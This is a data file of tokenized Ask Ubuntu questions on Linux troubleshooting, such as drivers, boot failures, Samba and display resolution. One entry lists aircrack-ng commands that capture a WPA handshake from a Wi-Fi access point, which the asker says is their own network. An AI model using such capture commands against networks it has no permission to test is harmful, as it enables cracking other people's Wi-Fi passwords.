416389	difference between `no such file or directory` and `` no such device or address	recently , i tried to install a pptp vpn on my openvz vps ubuntu 12.04 . i followed the online tutorial and tried : cat /dev/ppp output is : cat : /dev/ppp : no such file or directory it turns out in this situation your vps can not install pptp vpn . the correct output should be : cat : /dev/ppp : no such device or address what is the difference ? the two outputs look similar but turn out to be totally different .
416390	ubuntu installer ca n't recognize windows 7	on my laptop hp pavilion 15 i 've installed windows 7 with 3 partitions . after that i wanted to install ubuntu in a certain partition ( empty one ) , but when i launch ubuntu installer it ca n't recognize windows 7 or the three partitions . and when i choose the option `` something else '' it shows me that i have one partition of 500 gb ! ! .
416392	which os version , i386-driver scanner + server	i have some of a problem i must have some help with . here 's the thing : i have the responsibility to replace windows xp with linux on a hp compaq dx2300 . i will use ubuntu since it is the flavour of linux i am most familiar with . the computer will have two main missions : primary , to make data stored at extra internal harddrive able to access from other computers as a server . secondary , to make use of a old scanner , scanexpress a3 usb 1200 pro , which driver is only compatible with i386/32-bit-system ( have the driver in .deb-package ) . both this have to work . i would preferable use the server edition for 13.10 ( only amd64 ) , but will it work with the scanner , in any sort of driver backward-compatibility configuration ? since i will install ubuntu without access to the network the computer later will operate on , how do i do with the installation ? is it easier to install the desktop version and convert it to server edition ? i have installed the desktop version nearly twenty times before but i am new for the server edition , so i have not so much experience with the server edition . thanks in advance .
416393	low screen resolution	the max i can set my resolution currently is 1024x768 , but my laptop 's native resolution is 1920x1080 . i 've always been able to set it to 1920x1080 without issue , but since i broke my video driver ( i installed 'nvidia-current ' which broke my display , see this thread ) i have n't been able to get above the aforementioned 1024x768 . i 've tried the instructions from this thread and this wiki but have n't made any progress . video card : travis @ travis-thinkpad-w510 : ~ $ lscpi |grep vga 01:00.0 vga compatible controller : nvidia corporation gt216glm [ quadro fx 880m ] ( rev a2 ) output for 'xrandr' travis @ travis-thinkpad-w510 : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 848x480 0.0 640x480 60.0 any suggestions ? method used for trying to create ' -- newmode' travis @ travis-thinkpad-w510 : ~ $ cvt 1920 1080 # 1920x1080 59.96 hz ( cvt 2.07m9 ) hsync : 67.16 khz ; pclk : 173.00 mhz modeline `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync travis @ travis-thinkpad-w510 : ~ $ xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync xrandr : failed to get size of gamma for output default x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 19 current serial number in output stream : 19 how do i fix my resolution ? any ideas ?
416395	extern w-lan adapta ( netgear ) - driver compatibility	how to connect to a wireless router , if my pc hase n't got a intern wireless ( but extern ) ? is ubuntu able , to read the driver of my netgear w-lan adapta ( extern w-lan connection ) ?
416397	setup git to pull vps folder- /var/www from ubuntu 12.04 apache web server to ubuntu 13.10 desktop	i want to setup git on my vps ( ubuntu server 12.04 lts ) and my linux machine ( ubuntu desktop 13.10 ) . i want to be able to use git pull command to pull my code from my /var/www folder so that i can edit it locally and then push the changes onto my vps thus being able to pull the config from anywhere please help : ( i do n't want to use github ( as an external server ) to do this as i only want my pc and my vps to have any source code
416399	problems with the /var/www folder	i am new to ubuntu , i 've installed 12.04 . i used to use wamp server on windows , and after changing os i moved some files from www folder to /var/www on ubuntu . but when i try to view that folder in a browser it does n't display anything . probably there is a problem with permission issues . what are proper permissions for /var/www folder ? here are my /var folder permissions : drwxrwxr-x 4 root root 1024 feb 4 20:06 www i have run chmod -r 755 /var/www chown -r root /var/www right now that /var/www folder is empty , but how can i configure apache to show files under that folder in browser ?
416401	can not install ubuntu sdk on ubutu 12.04	i have researched about this problem , and found nothing . i followed the instructions here , and everything seem to be fine but when i try to install the ubuntu sdk i get this error : sudo apt-get install ubuntu-sdk reading package list ... done creating dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ubuntu-sdk : depends : qtcreator-plugin-ubuntu but it is not going to install recommends : ubuntu-html5-container-examples but it is not installable e : unable to correct problems , you have held broken packages .
416402	why are all my kernel modules being force-loaded	i ran cpio to copy all the files form the 'old server ' to the 'new server ' and then installed a new kernel and initrd in /boot and copied all the modules from /lib/modules on a 'fresh ' install of the same version/kernel of ubuntu -- 12.04 and 3.8.0-34-generic we get kpanics every so often ( maybe a month between them ) that have ( f ) next to all loaded modules . i can also see they have all been force-loaded when i look in /sys/module/ $ modules/taint indicated by f lsinitramfs /initrd.img shows that it 's looking for the correct modules to load , so there should not be a version mismatch causing the need for -f on modprobe or insmod
416403	stuck with upgrade tool - upgrader window out of screen	what the title says . important bit is that also 'ok ' and 'cancel ' buttons are out of screen boundary too , thus un-clickable . because of the nature of upgrade , i ca n't close and start again . background : was doing upgrade from 13.04 - > 13.10 , clicked the details button to took a look at package changes . sporting cinnamon . additionally , where i should file the bug report ? this is intolerable . i knew i should have used the terminal instead .
416404	mythbuntu 12.04.3 64-bit : keyboard and mouse behave strange	during the installation of myhtbuntu 12.04.3 my usb keyboard and mouse ( trust ) behave strange . e.g . when i try the keyboard for language german i can type the first letter but then no further key input is accepted . if i move the mouse then with every move a thunar window pops up resulting in serveral open windows . what can i do to get the keyboard and mouse working ?
416409	install unity 7.1.2 in ubuntu 12.04 , is possible ?	i have upgraded ubuntu 13.04 to 13.10 . i like very more the default unity interface . the command unity -- version return unity 7.1.2 . the problem in ubuntu 13.10 is than i give errors on installation php5 , mysql , i have found than i need to use 12.04 if i want to run on it apache2 , php5 , mysql , phpmyadmin . if i install ubuntu 12.04 on my laptop i use the latest version of unity ? if yes , how ?
416412	if i disable ueif on windows 8 , can i use the windows installer ?	i have a lenovo u430 laptop and would like to dual boot ubuntu and windows 8 . if i disable ueif can i do that and install ubuntu with the installer ?
416414	music production tools ( dj )	i just switched to ubuntu 12.04 from windows 8.1 and i really like it . although it requires getting used to some different things , nothing in my normal routine that i do has been affected by the switch . except for one thing . i dj and make my own tracks . i have 2 mixers i used on windows and have n't found any dj type programs for ubuntu . and they are n't listed on wine . is there any work around ? i use djuced and mixmeister pro .
416415	sharing issues between ubuntu 12.04 and win7	background : i have an htpc with a raid 5 array . this setup has been working for nearly 1 year without a single hiccup . ubuntu 12.04lts is installed on a separate ssd within the htpc . i have a pc where i do my ripping , encoding , picture editing , etc . running windows 7 . for the last year , my entire array was accessible to me via network shortcuts so i could copy over the network from windows machine to ubuntu machine where my media is located . my media is safe and the raid array and xbmc functioning correctly . while setting up this htpc , i did save many of the websites i used to help me . it seems , though , i did n't save the samba ones ... problems start : for whatever reason , a few weeks ago , i uninstalled samba . i do n't remember exactly what i was trying to do , but i seem to remember thinking i did n't need it anymore . make a long story short , i reinstalled it , got my shares working again , although , not exactly as they worked before . previous to my stupidity , when i would open the ubuntu file explorer , my raid array ( `` raid 5 storage '' or /storage ) would show up as a folder ( called `` raid 5 storage '' ) right next to the network . since reinstalling samba , that no longer happens . this is n't a big deal , because i can still access my array via /storage . however , this tells me i did not configure something properly , or at least as it was before . not a big deal , just slightly vexing . now i need help ... today , i installed a program called boxcryptor on my windows machine to play around with it . it maps all cloud storage accounts to a single folder for encryption . it uses x : . x : happened to be my movies share . it caused some weird interactions . after installation and restarting , none of my shares work . after uninstallation and restarting , none of my shares work . ubuntu machine is gone from the network . i have removed samba , reinstalled samba , stopped , started , reconfigured , poured over the .conf file . i 'm stumped ( it 's not hard to do ... ) . i absolutely need ( want ? ) samba to work in the way that it previously worked . i have seen countless google search results needed to change this setting or that on the windows machine that i feel have nothing to do with this problem . from windows , i ca n't even see ubuntu in my windows workgroup anymore . from ubuntu , i can see the workgroup , but ca n't access it . i am 90 % certain all of these problems are the result of wrong settings in samba . i just ca n't wrap my head around it at the moment . thanks to anyone willing to assist .
416417	handling leap seconds with date	i am running clockspeed-0.62 ( djb software ) on ubuntu 13.10 . i have setup timezones so that /usr/share/zoneinfo is a link to /usr/share/right , and my /etc/leapsecs.dat is up-to-date , i.e contains 25 leap seconds . could someone help me to understand ( and to solve ) why date -u command shows time 25 seconds ahead export tz=utc ; date ? output of date ; ( export tz=utc ; date ) ; date -u : mon feb 3 22:33:56 cet 2014 mon feb 3 21:33:56 utc 2014 mon feb 3 21:34:21 utc 2014
416418	error : attempt read-write outside of disk `hd0`	my problem this problem has been plaguing my boot for a while , it happens about half the times i start up my computer . grub will load successfully , and wait ten seconds for me to choose which os to boot into . when i choose ubuntu , i am ( 4/5 times ) confronted with this error : error : attempt to read or write outside of disk `hd0` . error : you need to load the kernel first . press any key to continue ... or this one : error : attempt to read or write outside of disk `hd0` . press any key to continue ... when it displays the first error , pressing enter will make it go back to the main menu . but when it is displaying the second error , without you need to load the kernel first , pressing any key will result in loading ubuntu , and a kernel panic . this does n't happen every time though . if i try enough times , it will work . debugging information $ fdisk -l disk /dev/sda : 120.0 gb , 120034123776 bytes 255 heads , 63 sectors/track , 14593 cylinders , total 234441648 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d0b78 device boot start end blocks id system /dev/sda1 * 2048 83886079 41942016 7 hpfs/ntfs/exfat /dev/sda2 83886080 234440703 75277312 5 extended /dev/sda5 83888128 109053951 12582912 83 linux /dev/sda6 109056000 234440703 62692352 83 linux $ sudo fsck -f /dev/sda5 fsck from util-linux 2.20.1 e2fsck 1.42 ( 29-nov-2011 ) pass 1 : checking inodes , blocks , and sizes pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information /dev/sda5 : 207541/786432 files ( 0.3 % non-contiguous ) , 1389304/3145727 blocks $ sudo fsck -f /dev/sda6 fsck from util-linux 2.20.1 e2fsck 1.42 ( 29-nov-2011 ) pass 1 : checking inodes , blocks , and sizes pass 2 : checking directory structure pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information ubuntu-home : 194036/3923968 files ( 0.6 % non-contiguous ) , 11943110/15673088 blocks boot-info summary from boot-repair : http : //paste.ubuntu.com/6886738/ things i 've tried running sudo update-grub running sudo grub-install /dev/sda using boot-repair ( more than once ) . i used the options purge grub before reinstalling it and purge kernels then reinstall last kernel . i 've also tried reset extra space after mbr . i also saw other questions asking around the same thing , but as far as i can tell they all were about getting the grub rescue prompt with this error , rather than after selecting ubuntu .
416431	ca n't enable bluetooth in 13.10	i 've been having a really hard time with this one ... i 've had my asus x301a since last year , solely under ubuntu 12.04 until recently ( a month or so ) , when i switched to 13.04 . more recently , i bought a bluetooth headset which works like a charm with my phone and reminded me that i had bluetooth on my pc . getting to the point now : i ca n't seem to figure out how to get bluetooth working . when i try to enable it via gui , it does n't do anything at all : edit : i upgraded to 13.10 and re-ran the checks , here 's what i get now : jmcomets ~ $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no jmcomets ~ $ hcitool dev devices : jmcomets ~ $ hcitool scan device is not available : no such device jmcomets ~ $ lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 13d3:5165 imc networks bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub jmcomets ~ $ dmesg | grep -i blue [ 27.325857 ] bluetooth : core ver 2.16 [ 27.325879 ] bluetooth : hci device and connection manager initialized [ 27.325887 ] bluetooth : hci socket layer initialized [ 27.325889 ] bluetooth : l2cap socket layer initialized [ 27.325895 ] bluetooth : sco socket layer initialized [ 27.484857 ] bluetooth : rfcomm tty layer initialized [ 27.484870 ] bluetooth : rfcomm socket layer initialized [ 27.484872 ] bluetooth : rfcomm ver 1.11 [ 28.008427 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 28.008431 ] bluetooth : bnep filters : protocol multicast [ 28.008440 ] bluetooth : bnep socket layer initialized jmcomets ~ % lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 network controller : ralink corp. rt5390 wireless 802.11n 1t/1r pcie 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 03:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0a ) even better now , bluetooth does n't show up at all with rfkill .
416432	bootable dvd 12.04.3 lts works on some windows xp pc 's , not on others	i downloaded 32bit 12.04lts to dvd and loaded on three different windows xp pc 's ( one as dual boot ) . all three were very old pc 's with less than 512mb memory or less . for some reason i ca n't install ubuntu 12.04.3lts on any other 32bit windows xp nor windows 7 pc 's . the windows 7 pc has 4gb memory the others less than 1gb . i 've downloaded 12.04 again to both ( another ) dvd and usb , checked the bio settings and rebooted but nothing seems to work . the pc 's ( i 've tried three of them ) all just open to windows . when i go to `` my computer '' , i see the ubuntu disc or file but it wo n't boot . i ca n't open the disc to find an .exe file . any idea what i 'm doing wrong ?
416434	when restarting my laptop after installing ubuntu , the computer just stays on with a black screen	i have a lenovo thinkpad t400 that i recently bought used . i put in an ssd that had windows 7 on it . i decided to install ubuntu and remove windows because the same problem was happening . when windows wanted me to restart the computer to install the drivers , the computer would just stay in a black screen and not reboot . when i turned it off manually with the power button , it would shut down , and when i turned it back on , it would work fine again . now i 'm having the same issue with ubuntu . when i was prompted to restart the computer , it would just stay on with a black screen . is this a hardware problem ? what should i do ?
416435	force to use specific number of cores	i am using ubuntu 13.10 on laptop that has intel i5 ( 4 logical cores ) . question : can i force ubuntu to use only one or two cores ? explanation : i want to test how my application performance scales when machine has more cores available . i know that it is easier to do it on virtual machine ( and assign specific number of cores ) but on virtual machine i am afraid , that amount of ram memory will be not sufficient . application consumes up to 3gb of ram and my laptop has only 4gb of ram .
416436	hacking oxford advanced learners dictionary 's my topics to be available on multiple machines	how to make oxford advanced learners dictionary 8th edition mytopics list to sync across multiple machines using sparkleshare ?
416438	wifi button never turns on	i am using ubuntu 12.04 lts on a 32 bit operating system . ever since i started using it as my secondary os , i am not being able to use wifi in it as the wifi light on my hardware key on the laptop is always orange even though the bluetooth keeps turning on and off . i am using hp pavilion g6 laptop and my laptop has rtl8101e/rtl8102e installed in it . please please try to help.. i have updated my sofware a lot of times and have read many blogs but none could help me solve my problem ! ! kindly help ! thank you in advance !
416441	ca n't ping virtualbox server operating system	i am using a 13.10 ubuntu client and i have installed a 12.04 server with the help of virtualbox . i am new user of linux and this is my first server that i am trying to create for experimentation purposes . i am trying to ping the server from the client but i keep getting this message when i terminate the process : ping 10.0.2.15 ( 10.0.2.15 ) 56 ( 84 ) bytes of data . ^c -- - 10.0.2.15 ping statistics -- - 9 packets transmitted , 0 received , 100 % packet loss , time 7999ms but when i ping the server from his own terminal : ping 10.0.2.15 ( 10.0.2.15 ) 56 ( 84 ) bytes of data . 64 bytes from 10.0.2.15 : icmp_req=1 ttl=64 time=0.176 ms 64 bytes from 10.0.2.15 : icmp_req=2 ttl=64 time=0.049 ms 64 bytes from 10.0.2.15 : icmp_req=3 ttl=64 time=0.049 ms 64 bytes from 10.0.2.15 : icmp_req=4 ttl=64 time=0.049 ms 64 bytes from 10.0.2.15 : icmp_req=5 ttl=64 time=0.049 ms 64 bytes from 10.0.2.15 : icmp_req=6 ttl=64 time=0.049 ms 64 bytes from 10.0.2.15 : icmp_req=7 ttl=64 time=0.049 ms ^c -- - 10.0.2.15 ping statistics -- - 7 packets transmitted , 7 received , 0 % packet loss , time 6008ms i have been searching on the net for possible similar problems and i found that maybe the firewall is blocking the requests . i disabled the firewall and i set all requests to accept . chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination i also used sudo ufw disable but still i can not ping my server . by applying traceroute -n 10.0.2.15 i get the following response : traceroute to 10.0.2.15 ( 10.0.2.15 ) , 30 hops max , 60 byte packets 1 193.11.184.1 1.622 ms 1.597 ms 2.477 ms 2 194.47.128.72 3.308 ms 3.314 ms 3.310 ms 3 194.47.128.237 3.816 ms 3.822 ms 4.157 ms 4 * * * 5 * * * 6 * * * 7 * * * 8 * * * 9 * * * 10 * * * 11 * * * 12 * * * 13 * * * 14 * * * 15 * * * 16 * * * 17 * * * 18 * * * 19 * * * 20 * * * 21 * * * 22 * * * 23 * * * 24 * * * 25 * * * 26 * * * 27 * * * 28 * * * 29 * * * 30 * * * i know that probably is a small configuration that i might need to adjust but since i am not familiar with this area i am completely lost . any suggestions would be much appreciated .
416444	ubuntu server 13.10 - wlan0 interface not found	so basically , i run a minecraft server and an ssh server on a ubuntu computer . it used to run ubuntu desktop and acted as a server . yesterday i decided to change the os to ubuntu server 13.10 ... the installation worked well , i connected to wifi and installed some packages ( openssh and stuff ) . now when it rebooted into the actual installation i did ping www.google.com and i got unknown host . i went into /etc/network/interfaces and saw that wlan0 was set up correctly ( or at least it looked that way ) . but the computer times out on startup when it tries to detect networking interface ... i do n't have internet on that server anymore , and i do n't have an ethernet cable . what can i do ? ?
416445	can i adjust computer display size to fit broken screen ?	the right 1/4 of my hp laptop screen is broke and does not display anything . i would like to adjust the display of the screen to fit in the 3/4 of the screen that works . i do not want to change the resolution ; i want to change the position and size of the display ( kind of like you would a window ) so i can see everything . is this possible in any way ? thank you .
416446	gnome terminal to have the same color change , based on the background , as unity ?	this is a silly question , but i would like to know if it is possible , as the title says , to make gnome terminal on ubuntu to change its background color ( default purple ) to a color based on the background , much like how unity works for its left-side bar . thanks in advance !
416447	while debugging in eclipse the ui freezes completely . how can i find out what 's going wrong ?	i 'm using ubuntu 13.10 and am debugging java swing events with eclipse 4.3 . at a specific point a popup menu is shown by my application and that 's the point where my ui freezes . just the mouse pointer can be moved but nothing responds to it . to end the freeze i go to tty1 , look up the latest java process and kill it . i would like to find out what causes this error . is it a systematical error or is there anything wrong ? the reason i care is , because i would like to simply debug over that single point of interest : - ) the log files show no important entries ( but i 'm not totally sure about that ) . xsession-errors is n't updated and if i kill the process with -9 the situation continues to be akward : key events work but the mouse is still not working correctly . until i close eclipse . imo this is a sign for something memory related . but top and the ui-tool show that there 's enough memory left . so what can i do to find the source of this problem ?
416448	.local domain error	when i use my n150 belkin usb adapter i get .local domain error and cant browse the web . if i am wired it works fine and i have no issues .
416452	ubuntu hardware market	can anyone show me where i can find information about the computer hardware market with pre-installed ubuntu software on it ? in other words , what is the current market like ? how many units are expected to be sold in 2014 , etc . i know that the top selling companies in this market are : system 76 , zareason , think penguin and emperor linux . thanks !
416454	ubuntu server 12.04 - marvel card aoc-sas2lp-mv8 sata not recognized !	i have 2 marvel aoc-sas2lp-mv8 sata cards not recognized by ubuntu server 12.04 . i tried to recompile the drivers provided for redhat and suse without success . they are connected four hardrives per cards . it appears in the bios but not on ubuntu . any idea ? regards ,
416457	not booting and not allowing update via recovery	i was using my dell laptop with ubuntu 12.04 yesterday just fine . howerver today it will not boot . it 's getting stuck while booting at stopping system v runlevel compatibility [ ok ] . when here the laptop shows that line for about half a second , then the screen goes black , and then it tries again ( over and over ) . i have now entered recovery mode and gone in to the console . from here i tried to update , just because it 's a good thing to try , but i 'm being presented with this error dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . running the suggested command yields this error - unable to access dpkg status area : read-only file system can anyone please help me to gwt my laptop working again . thanks .
416459	how change default audio-device on ubuntu phablet	i tried to use my logitech g930 on a galaxy nexus ( gt-i9250 ) but it did not work . it is working on a s3 . i love ubuntu , my whole household is a homogenus ubuntu network and i study computer science . i istallted the latest phablet on my nexus and got ssh accses , the light on the wireless adapter is already lit and normaly i would go to the `` audio-setting '' and just change to the headset . how do i make it work : )
416460	pcap file missing when running airodump-ng	i ca n't get my pcap/kismet and the others file in my home folder when using airodump-ng ( monitor mode-as my networks as target ap ) from aircrack-ng . where is the file gone ? when i search on my system i still ca n't find it . for info , i am using ubuntu 12.04 lts ( kernel 3.8 ) and latest aircrack 1.2 beta 2 . maybe i have miss some file on my ubuntu ? please help.thanks a lot . here is my command ; root @ jinggo : ~ # airmon-ng interface chipset driver wlan0 atheros ar9285 ath9k - [ phy0 ] wlan1 ralink rt2870/3070 rt2800usb - [ phy1 ] root @ jinggo : ~ # airmon-ng start wlan1 found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! -e pid name 1113 avahi-daemon 1116 avahi-daemon 1142 networkmanager 1350 wpa_supplicant interface chipset driver wlan0 atheros ar9285 ath9k - [ phy0 ] wlan1 ralink rt2870/3070 rt2800usb - [ phy1 ] ( monitor mode enabled on mon0 bssid pwr beacons # data , # /s ch mb enc cipher auth essid xx : xx : xx : xx : xx : xx -64 40 4 0 12 54e wpa2 ccmp psk jinggo -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - root @ jinggo : ~ # airodump-ng -c 12 -w filename -- bssid xx : xx : xx : xx : xx : xx -- ignore-negative-one mon0 ch 12 ] [ elapsed : 1 min ] [ 2014-02-05 08:47 ] [ wpa handshake : xx : xx : xx : xx : xx : xx bssid pwr rxq beacons # data , # /s ch mb enc cipher auth essid xx : xx : xx : xx : xx : xx -65 100 561 186 2 12 54e wpa2 ccmp psk jinggo bssid station pwr rate lost frames probe xx : xx : xx : xx : xx : xx 00:01:02:03:04:05 0 36e-24e 0 178 all this command is the same that i used it on kali-linux ( usb boot ) except the -- ignore negative one ( without it ) . it run perfectly and i can get the pcap file in home folder . actually i am still learning and new to linux and i just copy , paste and edit from my terminal . sorry for my bad english , thanks a lot .
416461	bad screen resolution on full screen apps/games ubuntu 13.10	my problem started after i upgraded to 13.10 from 13.04 . any time i try to play 7 kingdoms or use wine in full screen it gets set to an out of range screen size . how would i go about setting the resolution of a full screen app ? i have an integrated geforce 6150se nforce 430 , using the nvidia-304 driver . lspci | grep vga vga compatible controller : nvidia corporation c61 [ geforce 6150se nforce 430 ] ( rev a2 ) i have also found other people with a similar error that says it seems to be related to sdl settings and compiz . reinstalled ubuntu 13.10 and still when starting seven kingdoms it is set to out of range full screen resolution
416464	sudo make wo n't work	i ca n't install anything in .tar.gz format because it tells me make : *** no targets specified and no makefile found . stop . what do i do ?
416469	upgrade kernel to 3.8.0-35-generic fails to boot . `` gave up waiting for root device ''	the previous kernel 3.8.0-34 was fine , and is still fine when i choose `` older kernels '' from the grub screen at boot . note , this is a corporate system on vmware and using lvm as per defaults . have tried suggestions at upgrade kernel to 3.8.0-35-generic fails to boot . missing initrd.img-3.8.0-29-generic but no joy with those .
416470	ca n't boot after upgrade from 12.04 to 12.10	after installing 3 days ago ubuntu 12.04 , today i was asked to upgrade to 12.10 . i did it and after rebooting , i have the purple screen of ubuntu for a second , and then i got a black one permanently . i have tried to do as it is said here my computer boots to a black screen , what options do i have to fix it ? and to reinstall the nvida driver ( apt-get install nvida-current ) but it is still the same . any suggestion ?
416471	determine what bay a drive was inserted into	i have the unique problem of trying to figure out what drive bay a drive was inserted into given the disk 's device name ( e.g : /dev/sdb1 ) . a little bit of background : the machine i 'm working with has about 16 external drive bays and i need to be able to give the operator instructions such as : remove disk from bay # 12 . at first i was mapping drive bay numbers to scsi host port numbers but every time a drive is inserted into any of the bays , the scsi host id changes ( it increments ) . so my next plan is to map the drive bay numbers to a serial number ( or other unique identifier ) on the controller / scsi bus . if a controller has more than one drive bay , i can use luns to differentiate them . however , i do n't have a clue how to find this unique identifier . tldr : so my question : given a device name ( such as /dev/sdb1 ) how can i figure out what drive bay it 's inserted into ( assuming some kind of manual mapping has happened previously ) .
416473	dealing with alias hostname ubuntu and apache server	i have installed and have up and running apache server on ubuntu 12.04 server . i also changed my /etc/hosts file and added an alias for my server . i 'm hosting a site locally , i want to be able to use another link to access the website as the current one is very long .
416474	hardrive is full with 0 space left ca n't access admin account	i just upgraded to ubuntu 13.10 and after all the packages are installed and the system restarted when i log into the admin account i can not see anything save for a black screen , when i log out and login through the guest account im getting an error saying `` you have 0 space in your hardrive '' . is there a way to rectify this or delete files from the main partition through the guest account ?
416477	how get ati fan noice down , hd4870 on newer ubuntu ?	i need some help on my graphic card and my ubuntu . iam using ubuntu 12.04 because ati is not supporting my hd4870 on newer kernel . i need the driver to kill the voice from the card . all worked on the system . fglx was available to my os . but after install all latex packs my aticonfig is not availabel now . my big question is , what could be the reason ? and how can i reduce the noice of my card , to run maybe the newes ubuntu for me ( like 13.10 ) ? my goal is to kill the noice of the card , to programming in more quite . no games get touched . can someone pls help me ?
416478	ca n't get quodlibet to work on 13.10	i installed quodlibet but i ca n't get it to work . when i select an ogg file it just fades to dark and then i have to force quit . any ideas ? thanks , bob edit-here 's the output : $ quodlibet quod libet is already running . w : unable to write to /home/bob/.quodlibet/control . removing it . w : could n't connect to a device backend . w : no device backend , media devices browser disabled . error grabbing key 173 , 0xdf8120 error grabbing key 171 , 0xdf8120 error grabbing key 172 , 0xdf8120 error grabbing key 209 , 0xdf8120 error grabbing key 174 , 0xdf8120 /usr/lib/python2.7/dist-packages/quodlibet/qltk/session.py:18 : warning : attempt to add property gnomeprogram : :sm-connect after class was initialised gnome.init ( app_id , const.version ) /usr/lib/python2.7/dist-packages/quodlibet/qltk/session.py:18 : warning : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised gnome.init ( app_id , const.version ) /usr/lib/python2.7/dist-packages/quodlibet/qltk/session.py:18 : warning : attempt to add property gnomeprogram : :display after class was initialised gnome.init ( app_id , const.version ) /usr/lib/python2.7/dist-packages/quodlibet/qltk/session.py:18 : warning : attempt to add property gnomeprogram : :default-icon after class was initialised gnome.init ( app_id , const.version )
416482	application menu options not click able	i 'm using ubuntu 13.10 and gnome 3.10 . everything was working okay . suddenly i noticed that application menu options are not clickable for all the applications . i 've added a screenshot and the same thing happens for all the applications . i tried resetting unity and removing ~/.config/menu but no luck . edit : everything works fine in gnome desktop . options on the upper right corner also works fine .
416483	is this possible to bring back a live cd session after an accidental cd-rom unplugging for a while ?	there was a power outage when i was using a live cd on my laptop with external cd - rom connected to wall power supply , so cd was unaccessible and maybe unmounted for a second . then the power came back and the os seems to be alive but the x desktop is just a background image and ttys are avaible ( i can disply all of them ) and i can type but ca n't execute anything - i can only see errors like : squashfs error : unable to read and info : task xxx blocked for more than 120 seconds . is there any way or chance to get access to virtual filesystem or just unblock it yet without rebooting ? my live cd is ubuntu 10.04 .
416485	i have a tplink wn723n v3 usb dongle .. but it doesnot seem to work in ubuntu 13.04 ?	lsusb : : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub **bus 001 device 004 : id 0bda:8179 realtek semiconductor corp.** bus 002 device 003 : id 03f0:5307 hewlett-packard lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation 7 series chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 00:1f.6 signal processing controller : intel corporation 7 